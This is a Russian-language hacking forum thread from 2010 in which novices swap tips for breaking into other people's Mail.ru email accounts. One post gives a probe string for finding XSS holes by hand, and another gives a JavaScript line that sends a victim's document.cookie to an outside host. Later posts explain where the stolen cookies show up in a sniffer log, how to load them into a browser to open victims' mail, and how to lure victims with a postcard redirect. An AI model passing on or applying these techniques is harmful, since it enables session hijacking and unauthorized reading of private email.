HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 12.01.2010, 01:00
noxcho
Новичок
Регистрация: 11.01.2010
Сообщений: 5
С нами: 8596406

Репутация: 0
По умолчанию

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.
 
Ответить с цитированием

  #112  
Старый 12.01.2010, 01:00
Meloman
Участник форума
Регистрация: 04.05.2010
Сообщений: 121
С нами: 8432642

Репутация: 3
По умолчанию

Цитата:

Сообщение от noxcho

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

программой не найдеш =) особенно на майл ру)

ручками можеш поимкать с помощью этого скрипта
">alert()
вставляеш его после первого знака = в адресной строке.
И еще в строчки где есть запрос на отправку
 
Ответить с цитированием

  #113  
Старый 12.01.2010, 01:00
Mirat_sc1
Новичок
Регистрация: 12.01.2010
Сообщений: 1
С нами: 8594966

Репутация: 0
По умолчанию

сори за глупость ! нокак это сделать ???

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;
 
Ответить с цитированием

  #114  
Старый 12.01.2010, 01:00
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

Цитата:

Сообщение от kamikadze1988

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

незнаю попробуй поменять ссылку на картинку.. (картинку вставь другую):turned:
 
Ответить с цитированием

  #115  
Старый 14.01.2010, 01:00
PioNeeRkin
Новичок
Регистрация: 14.01.2010
Сообщений: 2
С нами: 8592086

Репутация: 0
По умолчанию

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...
 
Ответить с цитированием

  #116  
Старый 14.01.2010, 01:00
vista1x
Новичок
Регистрация: 12.12.2009
Сообщений: 1
С нами: 8638533

Репутация: 0
По умолчанию

вообщем такая хрень у меня
делаю всё как сдесь.. куки приходят, всё норм
но когда сую куки в оперу, почта не открывается
что делать ?
 
Ответить с цитированием

  #117  
Старый 15.01.2010, 01:00
noxcho
Новичок
Регистрация: 11.01.2010
Сообщений: 5
С нами: 8596406

Репутация: 0
По умолчанию

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст
 
Ответить с цитированием

  #118  
Старый 15.01.2010, 01:00
vik76
Участник форума
Регистрация: 12.05.2009
Сообщений: 206
С нами: 8947766

Репутация: 51
По умолчанию

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

с пассивкой можно сделать редирект на открытку:wink: чел смотрит фотку ты смотришь его почту:turned:
 
Ответить с цитированием

  #119  
Старый 16.01.2010, 01:00
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

Цитата:

Сообщение от PioNeeRkin

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

куки на сниффере! в разделе "лог"

Добавлено через 10 минут

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет

Не знаю, у меня на майле все отлично работает =)
 
Ответить с цитированием

  #120  
Старый 20.01.2010, 01:00
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

смотри все ли правильно сделал! поидеи должны приходить! только если жертва не сохраняла сначала на комп а потом заходила.. тогда прийдет только ип. и через день и через 2 ты уже не зайдешь! они изменяются!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.